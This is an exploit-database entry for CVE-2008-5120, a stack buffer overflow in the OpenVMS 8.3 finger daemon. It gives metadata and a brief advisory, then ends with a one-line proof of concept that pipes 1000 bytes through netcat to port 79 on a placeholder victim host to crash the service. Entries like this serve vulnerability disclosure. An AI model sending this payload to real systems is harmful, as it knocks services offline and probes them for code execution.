EXPLOITS

OpenVms 8.3 Finger Service - Stack Buffer Overflow

Author: Shaun Colley
type: dos
platform: multiple
port: 
date_added: 2008-08-07  
date_updated: 2014-03-12  
verified: 1  
codes: CVE-2008-5120;OSVDB-49922  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32193.txt  

source: https://www.securityfocus.com/bid/30589/info

The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.

We were not told which versions are affected. We will update this BID as more information emerges.

echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79